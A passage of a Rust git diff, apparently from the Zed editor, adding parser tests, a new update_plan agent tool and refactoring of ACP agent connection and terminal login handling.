assert_eq!( + events.as_slice(), + &[ToolEditEvent::ContentChunk { chunk: "!".into() }] + ); + + // Finalize with no additional content + let events = parser.finalize_content("hello world!"); + assert!(events.is_empty()); + } + + #[test] + fn test_finalize_content_with_remaining() { + let mut parser = ToolEditParser::default(); + + 
parser.push_content("partial"); + let events = parser.finalize_content("partial content here"); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::ContentChunk { + chunk: " content here".into(), + }] + ); + } + + #[test] + fn test_content_trailing_backslash_held_back() { + let mut parser = ToolEditParser::default(); + + // Partial JSON fixer turns incomplete \n into \\ (literal backslash). + // The trailing backslash is held back. + let events = parser.push_content("hello,\\"); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::ContentChunk { + chunk: "hello,".into(), + }] + ); + + // Next partial corrects the escape to an actual newline. + // The held-back byte was wrong; the correct newline is emitted. + let events = parser.push_content("hello,\n"); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::ContentChunk { chunk: "\n".into() }] + ); + + // Normal growth. + let events = parser.push_content("hello,\nworld"); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::ContentChunk { + chunk: "world".into(), + }] + ); + } + + #[test] + fn test_content_finalize_with_trailing_backslash() { + let mut parser = ToolEditParser::default(); + + // Stream a partial with a fixer-corrupted trailing backslash. + // The backslash is held back. + parser.push_content("abc\\"); + + // Finalize reveals the correct character. 
+ let events = parser.finalize_content("abc\n"); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::ContentChunk { chunk: "\n".into() }] + ); + } + + #[test] + fn test_no_partials_direct_finalize() { + let mut parser = ToolEditParser::default(); + + let events = parser.finalize_edits(&[Edit { + old_text: "old".into(), + new_text: "new".into(), + }]); + assert_eq!( + events.as_slice(), + &[ + ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "old".into(), + done: true, + }, + ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "new".into(), + done: true, + }, + ] + ); + } + + #[test] + fn test_no_partials_direct_finalize_multiple() { + let mut parser = ToolEditParser::default(); + + let events = parser.finalize_edits(&[ + Edit { + old_text: "first old".into(), + new_text: "first new".into(), + }, + Edit { + old_text: "second old".into(), + new_text: "second new".into(), + }, + ]); + assert_eq!( + events.as_slice(), + &[ + ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "first old".into(), + done: true, + }, + ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "first new".into(), + done: true, + }, + ToolEditEvent::OldTextChunk { + edit_index: 1, + chunk: "second old".into(), + done: true, + }, + ToolEditEvent::NewTextChunk { + edit_index: 1, + chunk: "second new".into(), + done: true, + }, + ] + ); + } + + #[test] + fn test_old_text_no_growth() { + let mut parser = ToolEditParser::default(); + + let events = parser.push_edits(&[PartialEdit { + old_text: Some("same".into()), + new_text: None, + }]); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "same".into(), + done: false, + }] + ); + + // Same old_text, no new_text → no events + let events = parser.push_edits(&[PartialEdit { + old_text: Some("same".into()), + new_text: None, + }]); + assert!(events.is_empty()); + } + + #[test] + fn test_old_text_none_then_appears() { + let mut parser = ToolEditParser::default(); + + // Edit exists but 
old_text is None (field hasn't arrived yet) + let events = parser.push_edits(&[PartialEdit { + old_text: None, + new_text: None, + }]); + assert!(events.is_empty()); + + // old_text appears + let events = parser.push_edits(&[PartialEdit { + old_text: Some("text".into()), + new_text: None, + }]); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "text".into(), + done: false, + }] + ); + } + + #[test] + fn test_empty_old_text_with_new_text() { + let mut parser = ToolEditParser::default(); + + // old_text is empty, new_text appears immediately + let events = parser.push_edits(&[PartialEdit { + old_text: Some("".into()), + new_text: Some("inserted".into()), + }]); + assert_eq!( + events.as_slice(), + &[ + ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "".into(), + done: true, + }, + ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "inserted".into(), + done: false, + }, + ] + ); + } + + #[test] + fn test_three_edits_streamed() { + let mut parser = ToolEditParser::default(); + + // Stream first edit + parser.push_edits(&[PartialEdit { + old_text: Some("a".into()), + new_text: Some("A".into()), + }]); + + // Second edit appears + parser.push_edits(&[ + PartialEdit { + old_text: Some("a".into()), + new_text: Some("A".into()), + }, + PartialEdit { + old_text: Some("b".into()), + new_text: Some("B".into()), + }, + ]); + + // Third edit appears + let events = parser.push_edits(&[ + PartialEdit { + old_text: Some("a".into()), + new_text: Some("A".into()), + }, + PartialEdit { + old_text: Some("b".into()), + new_text: Some("B".into()), + }, + PartialEdit { + old_text: Some("c".into()), + new_text: None, + }, + ]); + + // Should finalize edit 1 (index=1) and start edit 2 (index=2) + assert_eq!( + events.as_slice(), + &[ + ToolEditEvent::NewTextChunk { + edit_index: 1, + chunk: "".into(), + done: true, + }, + ToolEditEvent::OldTextChunk { + edit_index: 2, + chunk: "c".into(), + done: false, + }, + ] + ); + + // Finalize 
+ let events = parser.finalize_edits(&[ + Edit { + old_text: "a".into(), + new_text: "A".into(), + }, + Edit { + old_text: "b".into(), + new_text: "B".into(), + }, + Edit { + old_text: "c".into(), + new_text: "C".into(), + }, + ]); + assert_eq!( + events.as_slice(), + &[ + ToolEditEvent::OldTextChunk { + edit_index: 2, + chunk: "".into(), + done: true, + }, + ToolEditEvent::NewTextChunk { + edit_index: 2, + chunk: "C".into(), + done: true, + }, + ] + ); + } + + #[test] + fn test_finalize_with_unseen_old_text() { + let mut parser = ToolEditParser::default(); + + // Only saw partial old_text, never saw new_text in partials + parser.push_edits(&[PartialEdit { + old_text: Some("partial".into()), + new_text: None, + }]); + + let events = parser.finalize_edits(&[Edit { + old_text: "partial old text".into(), + new_text: "replacement".into(), + }]); + assert_eq!( + events.as_slice(), + &[ + ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: " old text".into(), + done: true, + }, + ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "replacement".into(), + done: true, + }, + ] + ); + } + + #[test] + fn test_finalize_with_partially_seen_new_text() { + let mut parser = ToolEditParser::default(); + + parser.push_edits(&[PartialEdit { + old_text: Some("old".into()), + new_text: Some("partial".into()), + }]); + + let events = parser.finalize_edits(&[Edit { + old_text: "old".into(), + new_text: "partial new text".into(), + }]); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: " new text".into(), + done: true, + }] + ); + } + + #[test] + fn test_repeated_pushes_with_no_change() { + let mut parser = ToolEditParser::default(); + + let events = parser.push_edits(&[PartialEdit { + old_text: Some("stable".into()), + new_text: Some("also stable".into()), + }]); + assert_eq!(events.len(), 2); // old done + new chunk + + // Push the exact same data again + let events = parser.push_edits(&[PartialEdit { + old_text: 
Some("stable".into()), + new_text: Some("also stable".into()), + }]); + assert!(events.is_empty()); + + // And again + let events = parser.push_edits(&[PartialEdit { + old_text: Some("stable".into()), + new_text: Some("also stable".into()), + }]); + assert!(events.is_empty()); + } + + #[test] + fn test_old_text_trailing_backslash_held_back() { + let mut parser = ToolEditParser::default(); + + // Partial-json-fixer produces a literal backslash when the JSON stream + // cuts in the middle of an escape sequence like \n. The parser holds + // back the trailing backslash instead of emitting it. + let events = parser.push_edits(&[PartialEdit { + old_text: Some("hello,\\".into()), // fixer closed incomplete \n as \\ + new_text: None, + }]); + // The trailing `\` is held back — only "hello," is emitted. + assert_eq!( + events.as_slice(), + &[ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "hello,".into(), + done: false, + }] + ); + + // Next partial: the fixer corrects the escape to \n. + // Because edit text also holds back a trailing newline, nothing new + // is emitted yet. + let events = parser.push_edits(&[PartialEdit { + old_text: Some("hello,\n".into()), + new_text: None, + }]); + assert!(events.is_empty()); + + // Continue normally. The held-back newline is emitted together with the + // next content once it is no longer trailing. 
+ let events = parser.push_edits(&[PartialEdit { + old_text: Some("hello,\nworld".into()), + new_text: None, + }]); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "\nworld".into(), + done: false, + }] + ); + } + + #[test] + fn test_multiline_old_and_new_text() { + let mut parser = ToolEditParser::default(); + + let events = parser.push_edits(&[PartialEdit { + old_text: Some("line1\nline2".into()), + new_text: None, + }]); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "line1\nline2".into(), + done: false, + }] + ); + + let events = parser.push_edits(&[PartialEdit { + old_text: Some("line1\nline2\nline3".into()), + new_text: Some("LINE1\n".into()), + }]); + assert_eq!( + events.as_slice(), + &[ + ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "\nline3".into(), + done: true, + }, + ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "LINE1".into(), + done: false, + }, + ] + ); + + let events = parser.push_edits(&[PartialEdit { + old_text: Some("line1\nline2\nline3".into()), + new_text: Some("LINE1\nLINE2\nLINE3".into()), + }]); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "\nLINE2\nLINE3".into(), + done: false, + }] + ); + } +} diff --git a/crates/agent/src/tools/update_plan_tool.rs b/crates/agent/src/tools/update_plan_tool.rs new file mode 100644 index 0000000000000000000000000000000000000000..8d45f8aad42a8cb10b3164212e1cde2b0104bdc2 --- /dev/null +++ b/crates/agent/src/tools/update_plan_tool.rs @@ -0,0 +1,224 @@ +use crate::{AgentTool, ToolCallEventStream, ToolInput}; +use agent_client_protocol as acp; +use gpui::{App, SharedString, Task}; +use schemars::JsonSchema; +use serde::{Deserialize, Serialize}; +use std::sync::Arc; + +#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema, PartialEq, Eq)] +#[serde(rename_all = "snake_case")] +#[schemars(inline)] +pub enum PlanEntryStatus { + /// The task has not 
started yet. + Pending, + /// The task is currently being worked on. + InProgress, + /// The task has been successfully completed. + Completed, +} + +impl From for acp::PlanEntryStatus { + fn from(value: PlanEntryStatus) -> Self { + match value { + PlanEntryStatus::Pending => acp::PlanEntryStatus::Pending, + PlanEntryStatus::InProgress => acp::PlanEntryStatus::InProgress, + PlanEntryStatus::Completed => acp::PlanEntryStatus::Completed, + } + } +} + +#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema, PartialEq, Eq)] +pub struct PlanItem { + /// Human-readable description of what this task aims to accomplish. + pub step: String, + /// The current status of this task. + pub status: PlanEntryStatus, +} + +impl From for acp::PlanEntry { + fn from(value: PlanItem) -> Self { + acp::PlanEntry::new( + value.step, + acp::PlanEntryPriority::Medium, + value.status.into(), + ) + } +} + +/// Updates the task plan. +/// +/// Provide a list of plan entries, each with a step and status. +#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema, PartialEq, Eq)] +pub struct UpdatePlanToolInput { + /// The list of plan entries and their current statuses. 
+ pub plan: Vec, +} + +pub struct UpdatePlanTool; + +impl UpdatePlanTool { + fn to_plan(input: UpdatePlanToolInput) -> acp::Plan { + acp::Plan::new(input.plan.into_iter().map(Into::into).collect()) + } +} + +impl AgentTool for UpdatePlanTool { + type Input = UpdatePlanToolInput; + type Output = String; + + const NAME: &'static str = "update_plan"; + + fn kind() -> acp::ToolKind { + acp::ToolKind::Think + } + + fn initial_title( + &self, + input: Result, + _cx: &mut App, + ) -> SharedString { + match input { + Ok(input) if input.plan.is_empty() => "Clear plan".into(), + Ok(_) | Err(_) => "Update plan".into(), + } + } + + fn run( + self: Arc, + input: ToolInput, + event_stream: ToolCallEventStream, + cx: &mut App, + ) -> Task> { + cx.spawn(async move |_cx| { + let input = input + .recv() + .await + .map_err(|e| format!("Failed to receive tool input: {e}"))?; + + event_stream.update_plan(Self::to_plan(input)); + + Ok("Plan updated".to_string()) + }) + } + + fn replay( + &self, + input: Self::Input, + _output: Self::Output, + event_stream: ToolCallEventStream, + _cx: &mut App, + ) -> anyhow::Result<()> { + event_stream.update_plan(Self::to_plan(input)); + Ok(()) + } +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::ToolCallEventStream; + use gpui::TestAppContext; + use pretty_assertions::assert_eq; + + fn sample_input() -> UpdatePlanToolInput { + UpdatePlanToolInput { + plan: vec![ + PlanItem { + step: "Inspect the existing tool wiring".to_string(), + status: PlanEntryStatus::Completed, + }, + PlanItem { + step: "Implement the update_plan tool".to_string(), + status: PlanEntryStatus::InProgress, + }, + PlanItem { + step: "Add tests".to_string(), + status: PlanEntryStatus::Pending, + }, + ], + } + } + + #[gpui::test] + async fn test_run_emits_plan_event(cx: &mut TestAppContext) { + let tool = Arc::new(UpdatePlanTool); + let (event_stream, mut event_rx) = ToolCallEventStream::test(); + + let input = sample_input(); + let result = cx + .update(|cx| 
tool.run(ToolInput::resolved(input.clone()), event_stream, cx)) + .await + .expect("tool should succeed"); + + assert_eq!(result, "Plan updated".to_string()); + + let plan = event_rx.expect_plan().await; + assert_eq!( + plan, + acp::Plan::new(vec![ + acp::PlanEntry::new( + "Inspect the existing tool wiring", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::Completed, + ), + acp::PlanEntry::new( + "Implement the update_plan tool", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::InProgress, + ), + acp::PlanEntry::new( + "Add tests", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::Pending, + ), + ]) + ); + } + + #[gpui::test] + async fn test_replay_emits_plan_event(cx: &mut TestAppContext) { + let tool = UpdatePlanTool; + let (event_stream, mut event_rx) = ToolCallEventStream::test(); + + let input = sample_input(); + + cx.update(|cx| { + tool.replay(input.clone(), "Plan updated".to_string(), event_stream, cx) + .expect("replay should succeed"); + }); + + let plan = event_rx.expect_plan().await; + assert_eq!( + plan, + acp::Plan::new(vec![ + acp::PlanEntry::new( + "Inspect the existing tool wiring", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::Completed, + ), + acp::PlanEntry::new( + "Implement the update_plan tool", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::InProgress, + ), + acp::PlanEntry::new( + "Add tests", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::Pending, + ), + ]) + ); + } + + #[gpui::test] + async fn test_initial_title(cx: &mut TestAppContext) { + let tool = UpdatePlanTool; + + let title = cx.update(|cx| tool.initial_title(Ok(sample_input()), cx)); + assert_eq!(title, SharedString::from("Update plan")); + + let title = + cx.update(|cx| tool.initial_title(Ok(UpdatePlanToolInput { plan: Vec::new() }), cx)); + assert_eq!(title, SharedString::from("Clear plan")); + } +} diff --git a/crates/agent_servers/Cargo.toml b/crates/agent_servers/Cargo.toml index 
4d34632a248c5db35666e93cb068c7ec6727fc48..7151f0084b1cb7d9b206f57551ce715ef67483f7 100644 --- a/crates/agent_servers/Cargo.toml +++ b/crates/agent_servers/Cargo.toml @@ -30,8 +30,8 @@ env_logger = { workspace = true, optional = true } fs.workspace = true futures.workspace = true gpui.workspace = true +feature_flags.workspace = true gpui_tokio = { workspace = true, optional = true } -credentials_provider.workspace = true google_ai.workspace = true http_client.workspace = true indoc.workspace = true @@ -52,6 +52,7 @@ terminal.workspace = true uuid.workspace = true util.workspace = true watch.workspace = true +zed_credentials_provider.workspace = true [target.'cfg(unix)'.dependencies] libc.workspace = true @@ -61,7 +62,7 @@ nix.workspace = true client = { workspace = true, features = ["test-support"] } env_logger.workspace = true fs.workspace = true -language.workspace = true + indoc.workspace = true acp_thread = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } diff --git a/crates/agent_servers/src/acp.rs b/crates/agent_servers/src/acp.rs index c63e4fab2201671fa6448e9d58f6c925c2c91cd8..5f452bc9c0e2e9c2322042583295894a5866b053 100644 --- a/crates/agent_servers/src/acp.rs +++ b/crates/agent_servers/src/acp.rs @@ -7,20 +7,22 @@ use action_log::ActionLog; use agent_client_protocol::{self as acp, Agent as _, ErrorCode}; use anyhow::anyhow; use collections::HashMap; +use feature_flags::{AcpBetaFeatureFlag, FeatureFlagAppExt as _}; use futures::AsyncBufReadExt as _; use futures::io::BufReader; -use project::Project; -use project::agent_server_store::{AgentServerCommand, GEMINI_NAME}; +use project::agent_server_store::AgentServerCommand; +use project::{AgentId, Project}; use serde::Deserialize; use settings::Settings as _; -use task::ShellBuilder; +use task::{ShellBuilder, SpawnInTerminal}; use util::ResultExt as _; +use util::path_list::PathList; use util::process::Child; use std::path::PathBuf; use 
std::process::Stdio; +use std::rc::Rc; use std::{any::Any, cell::RefCell}; -use std::{path::Path, rc::Rc}; use thiserror::Error; use anyhow::{Context as _, Result}; @@ -30,17 +32,21 @@ use acp_thread::{AcpThread, AuthRequired, LoadError, TerminalProviderEvent}; use terminal::TerminalBuilder; use terminal::terminal_settings::{AlternateScroll, CursorShape, TerminalSettings}; +use crate::GEMINI_ID; + +pub const GEMINI_TERMINAL_AUTH_METHOD_ID: &str = "spawn-gemini-cli"; + #[derive(Debug, Error)] #[error("Unsupported version")] pub struct UnsupportedVersion; pub struct AcpConnection { - server_name: SharedString, - display_name: SharedString, + id: AgentId, telemetry_id: SharedString, connection: Rc, sessions: Rc>>, auth_methods: Vec, + command: AgentServerCommand, agent_capabilities: acp::AgentCapabilities, default_mode: Option, default_model: Option, @@ -124,13 +130,14 @@ impl AgentSessionList for AcpSessionList { .into_iter() .map(|s| AgentSessionInfo { session_id: s.session_id, - cwd: Some(s.cwd), + work_dirs: Some(PathList::new(&[s.cwd])), title: s.title.map(Into::into), updated_at: s.updated_at.and_then(|date_str| { chrono::DateTime::parse_from_rfc3339(&date_str) .ok() .map(|dt| dt.with_timezone(&chrono::Utc)) }), + created_at: None, meta: s.meta, }) .collect(), @@ -157,8 +164,8 @@ impl AgentSessionList for AcpSessionList { } pub async fn connect( - server_name: SharedString, - display_name: SharedString, + agent_id: AgentId, + project: Entity, command: AgentServerCommand, default_mode: Option, default_model: Option, @@ -166,8 +173,8 @@ pub async fn connect( cx: &mut AsyncApp, ) -> Result> { let conn = AcpConnection::stdio( - server_name, - display_name, + agent_id, + project, command.clone(), default_mode, default_model, @@ -182,8 +189,8 @@ const MINIMUM_SUPPORTED_VERSION: acp::ProtocolVersion = acp::ProtocolVersion::V1 impl AcpConnection { pub async fn stdio( - server_name: SharedString, - display_name: SharedString, + agent_id: AgentId, + project: Entity, 
command: AgentServerCommand, default_mode: Option, default_model: Option, @@ -195,6 +202,19 @@ impl AcpConnection { let mut child = builder.build_std_command(Some(command.path.display().to_string()), &command.args); child.envs(command.env.iter().flatten()); + if let Some(cwd) = project.update(cx, |project, cx| { + if project.is_local() { + project + .default_path_list(cx) + .ordered_paths() + .next() + .cloned() + } else { + None + } + }) { + child.current_dir(cwd); + } let mut child = Child::spawn(child, Stdio::piped(), Stdio::piped(), Stdio::piped())?; let stdout = child.stdout.take().context("Failed to take stdout")?; @@ -269,7 +289,7 @@ impl AcpConnection { cx.update(|cx| { AcpConnectionRegistry::default_global(cx).update(cx, |registry, cx| { - registry.set_active_connection(server_name.clone(), &connection, cx) + registry.set_active_connection(agent_id.clone(), &connection, cx) }); }); @@ -278,10 +298,11 @@ impl AcpConnection { acp::InitializeRequest::new(acp::ProtocolVersion::V1) .client_capabilities( acp::ClientCapabilities::new() - .fs(acp::FileSystemCapability::new() + .fs(acp::FileSystemCapabilities::new() .read_text_file(true) .write_text_file(true)) .terminal(true) + .auth(acp::AuthCapabilities::new().terminal(true)) // Experimental: Allow for rendering terminal output from the agents .meta(acp::Meta::from_iter([ ("terminal_output".into(), true.into()), @@ -304,7 +325,7 @@ impl AcpConnection { // Use the one the agent provides if we have one .map(|info| info.name.into()) // Otherwise, just use the name - .unwrap_or_else(|| server_name.clone()); + .unwrap_or_else(|| agent_id.0.to_string().into()); let session_list = if response .agent_capabilities @@ -320,9 +341,9 @@ impl AcpConnection { }; // TODO: Remove this override once Google team releases their official auth methods - let auth_methods = if server_name == GEMINI_NAME { + let auth_methods = if agent_id.0.as_ref() == GEMINI_ID { let mut args = command.args.clone(); - args.retain(|a| a != 
"--experimental-acp"); + args.retain(|a| a != "--experimental-acp" && a != "--acp"); let value = serde_json::json!({ "label": "gemini /auth", "command": command.path.to_string_lossy().into_owned(), @@ -330,19 +351,19 @@ impl AcpConnection { "env": command.env.clone().unwrap_or_default(), }); let meta = acp::Meta::from_iter([("terminal-auth".to_string(), value)]); - vec![ - acp::AuthMethod::new("spawn-gemini-cli", "Login") + vec![acp::AuthMethod::Agent( + acp::AuthMethodAgent::new(GEMINI_TERMINAL_AUTH_METHOD_ID, "Login") .description("Login with your Google or Vertex AI account") .meta(meta), - ] + )] } else { response.auth_methods }; Ok(Self { + id: agent_id, auth_methods, + command, connection, - server_name, - display_name, telemetry_id, sessions, agent_capabilities: response.agent_capabilities, @@ -360,6 +381,102 @@ impl AcpConnection { pub fn prompt_capabilities(&self) -> &acp::PromptCapabilities { &self.agent_capabilities.prompt_capabilities } + + fn apply_default_config_options( + &self, + session_id: &acp::SessionId, + config_options: &Rc>>, + cx: &mut AsyncApp, + ) { + let id = self.id.clone(); + let defaults_to_apply: Vec<_> = { + let config_opts_ref = config_options.borrow(); + config_opts_ref + .iter() + .filter_map(|config_option| { + let default_value = self.default_config_options.get(&*config_option.id.0)?; + + let is_valid = match &config_option.kind { + acp::SessionConfigKind::Select(select) => match &select.options { + acp::SessionConfigSelectOptions::Ungrouped(options) => options + .iter() + .any(|opt| &*opt.value.0 == default_value.as_str()), + acp::SessionConfigSelectOptions::Grouped(groups) => { + groups.iter().any(|g| { + g.options + .iter() + .any(|opt| &*opt.value.0 == default_value.as_str()) + }) + } + _ => false, + }, + _ => false, + }; + + if is_valid { + let initial_value = match &config_option.kind { + acp::SessionConfigKind::Select(select) => { + Some(select.current_value.clone()) + } + _ => None, + }; + Some(( + 
config_option.id.clone(), + default_value.clone(), + initial_value, + )) + } else { + log::warn!( + "`{}` is not a valid value for config option `{}` in {}", + default_value, + config_option.id.0, + id + ); + None + } + }) + .collect() + }; + + for (config_id, default_value, initial_value) in defaults_to_apply { + cx.spawn({ + let default_value_id = acp::SessionConfigValueId::new(default_value.clone()); + let session_id = session_id.clone(); + let config_id_clone = config_id.clone(); + let config_opts = config_options.clone(); + let conn = self.connection.clone(); + async move |_| { + let result = conn + .set_session_config_option(acp::SetSessionConfigOptionRequest::new( + session_id, + config_id_clone.clone(), + default_value_id, + )) + .await + .log_err(); + + if result.is_none() { + if let Some(initial) = initial_value { + let mut opts = config_opts.borrow_mut(); + if let Some(opt) = opts.iter_mut().find(|o| o.id == config_id_clone) { + if let acp::SessionConfigKind::Select(select) = &mut opt.kind { + select.current_value = initial; + } + } + } + } + } + }) + .detach(); + + let mut opts = config_options.borrow_mut(); + if let Some(opt) = opts.iter_mut().find(|o| o.id == config_id) { + if let acp::SessionConfigKind::Select(select) = &mut opt.kind { + select.current_value = acp::SessionConfigValueId::new(default_value); + } + } + } + } } impl Drop for AcpConnection { @@ -368,7 +485,69 @@ impl Drop for AcpConnection { } } +fn terminal_auth_task_id(agent_id: &AgentId, method_id: &acp::AuthMethodId) -> String { + format!("external-agent-{}-{}-login", agent_id.0, method_id.0) +} + +fn terminal_auth_task( + command: &AgentServerCommand, + agent_id: &AgentId, + method: &acp::AuthMethodTerminal, +) -> SpawnInTerminal { + let mut args = command.args.clone(); + args.extend(method.args.clone()); + + let mut env = command.env.clone().unwrap_or_default(); + env.extend(method.env.clone()); + + acp_thread::build_terminal_auth_task( + terminal_auth_task_id(agent_id, &method.id), 
+ method.name.clone(), + command.path.to_string_lossy().into_owned(), + args, + env, + ) +} + +/// Used to support the _meta method prior to stabilization +fn meta_terminal_auth_task( + agent_id: &AgentId, + method_id: &acp::AuthMethodId, + method: &acp::AuthMethod, +) -> Option { + #[derive(Deserialize)] + struct MetaTerminalAuth { + label: String, + command: String, + #[serde(default)] + args: Vec, + #[serde(default)] + env: HashMap, + } + + let meta = match method { + acp::AuthMethod::EnvVar(env_var) => env_var.meta.as_ref(), + acp::AuthMethod::Terminal(terminal) => terminal.meta.as_ref(), + acp::AuthMethod::Agent(agent) => agent.meta.as_ref(), + _ => None, + }?; + let terminal_auth = + serde_json::from_value::(meta.get("terminal-auth")?.clone()).ok()?; + + Some(acp_thread::build_terminal_auth_task( + terminal_auth_task_id(agent_id, method_id), + terminal_auth.label.clone(), + terminal_auth.command, + terminal_auth.args, + terminal_auth.env, + )) +} + impl AgentConnection for AcpConnection { + fn agent_id(&self) -> AgentId { + self.id.clone() + } + fn telemetry_id(&self) -> SharedString { self.telemetry_id.clone() } @@ -376,16 +555,19 @@ impl AgentConnection for AcpConnection { fn new_session( self: Rc, project: Entity, - cwd: &Path, + work_dirs: PathList, cx: &mut App, ) -> Task>> { - let name = self.server_name.clone(); - let cwd = cwd.to_path_buf(); + // TODO: remove this once ACP supports multiple working directories + let Some(cwd) = work_dirs.ordered_paths().next().cloned() else { + return Task::ready(Err(anyhow!("Working directory cannot be empty"))); + }; + let name = self.id.0.clone(); let mcp_servers = mcp_servers_for_project(&project, cx); cx.spawn(async move |cx| { let response = self.connection - .new_session(acp::NewSessionRequest::new(cwd).mcp_servers(mcp_servers)) + .new_session(acp::NewSessionRequest::new(cwd.clone()).mcp_servers(mcp_servers)) .await .map_err(map_acp_error)?; @@ -470,96 +652,15 @@ impl AgentConnection for AcpConnection { } if 
let Some(config_opts) = config_options.as_ref() { - let defaults_to_apply: Vec<_> = { - let config_opts_ref = config_opts.borrow(); - config_opts_ref - .iter() - .filter_map(|config_option| { - let default_value = self.default_config_options.get(&*config_option.id.0)?; - - let is_valid = match &config_option.kind { - acp::SessionConfigKind::Select(select) => match &select.options { - acp::SessionConfigSelectOptions::Ungrouped(options) => { - options.iter().any(|opt| &*opt.value.0 == default_value.as_str()) - } - acp::SessionConfigSelectOptions::Grouped(groups) => groups - .iter() - .any(|g| g.options.iter().any(|opt| &*opt.value.0 == default_value.as_str())), - _ => false, - }, - _ => false, - }; - - if is_valid { - let initial_value = match &config_option.kind { - acp::SessionConfigKind::Select(select) => { - Some(select.current_value.clone()) - } - _ => None, - }; - Some((config_option.id.clone(), default_value.clone(), initial_value)) - } else { - log::warn!( - "`{}` is not a valid value for config option `{}` in {}", - default_value, - config_option.id.0, - name - ); - None - } - }) - .collect() - }; - - for (config_id, default_value, initial_value) in defaults_to_apply { - cx.spawn({ - let default_value_id = acp::SessionConfigValueId::new(default_value.clone()); - let session_id = response.session_id.clone(); - let config_id_clone = config_id.clone(); - let config_opts = config_opts.clone(); - let conn = self.connection.clone(); - async move |_| { - let result = conn - .set_session_config_option( - acp::SetSessionConfigOptionRequest::new( - session_id, - config_id_clone.clone(), - default_value_id, - ), - ) - .await - .log_err(); - - if result.is_none() { - if let Some(initial) = initial_value { - let mut opts = config_opts.borrow_mut(); - if let Some(opt) = opts.iter_mut().find(|o| o.id == config_id_clone) { - if let acp::SessionConfigKind::Select(select) = - &mut opt.kind - { - select.current_value = initial; - } - } - } - } - } - }) - .detach(); - - let mut 
opts = config_opts.borrow_mut(); - if let Some(opt) = opts.iter_mut().find(|o| o.id == config_id) { - if let acp::SessionConfigKind::Select(select) = &mut opt.kind { - select.current_value = acp::SessionConfigValueId::new(default_value); - } - } - } + self.apply_default_config_options(&response.session_id, config_opts, cx); } let action_log = cx.new(|_| ActionLog::new(project.clone())); let thread: Entity = cx.new(|cx| { AcpThread::new( None, - self.display_name.clone(), + None, + Some(work_dirs), self.clone(), project, action_log, @@ -598,9 +699,10 @@ impl AgentConnection for AcpConnection { fn load_session( self: Rc, - session: AgentSessionInfo, + session_id: acp::SessionId, project: Entity, - cwd: &Path, + work_dirs: PathList, + title: Option, cx: &mut App, ) -> Task>> { if !self.agent_capabilities.load_session { @@ -608,29 +710,29 @@ impl AgentConnection for AcpConnection { "Loading sessions is not supported by this agent.".into() )))); } + // TODO: remove this once ACP supports multiple working directories + let Some(cwd) = work_dirs.ordered_paths().next().cloned() else { + return Task::ready(Err(anyhow!("Working directory cannot be empty"))); + }; - let cwd = cwd.to_path_buf(); let mcp_servers = mcp_servers_for_project(&project, cx); let action_log = cx.new(|_| ActionLog::new(project.clone())); - let title = session - .title - .clone() - .unwrap_or_else(|| self.display_name.clone()); let thread: Entity = cx.new(|cx| { AcpThread::new( None, title, + Some(work_dirs.clone()), self.clone(), project, action_log, - session.session_id.clone(), + session_id.clone(), watch::Receiver::constant(self.agent_capabilities.prompt_capabilities.clone()), cx, ) }); self.sessions.borrow_mut().insert( - session.session_id.clone(), + session_id.clone(), AcpSession { thread: thread.downgrade(), suppress_abort_err: false, @@ -640,25 +742,29 @@ impl AgentConnection for AcpConnection { }, ); - cx.spawn(async move |_| { + cx.spawn(async move |cx| { let response = match self .connection 
.load_session( - acp::LoadSessionRequest::new(session.session_id.clone(), cwd) - .mcp_servers(mcp_servers), + acp::LoadSessionRequest::new(session_id.clone(), cwd).mcp_servers(mcp_servers), ) .await { Ok(response) => response, Err(err) => { - self.sessions.borrow_mut().remove(&session.session_id); + self.sessions.borrow_mut().remove(&session_id); return Err(map_acp_error(err)); } }; let (modes, models, config_options) = config_state(response.modes, response.models, response.config_options); - if let Some(session) = self.sessions.borrow_mut().get_mut(&session.session_id) { + + if let Some(config_opts) = config_options.as_ref() { + self.apply_default_config_options(&session_id, config_opts, cx); + } + + if let Some(session) = self.sessions.borrow_mut().get_mut(&session_id) { session.session_modes = modes; session.models = models; session.config_options = config_options.map(ConfigOptions::new); @@ -670,9 +776,10 @@ impl AgentConnection for AcpConnection { fn resume_session( self: Rc, - session: AgentSessionInfo, + session_id: acp::SessionId, project: Entity, - cwd: &Path, + work_dirs: PathList, + title: Option, cx: &mut App, ) -> Task>> { if self @@ -685,29 +792,29 @@ impl AgentConnection for AcpConnection { "Resuming sessions is not supported by this agent.".into() )))); } + // TODO: remove this once 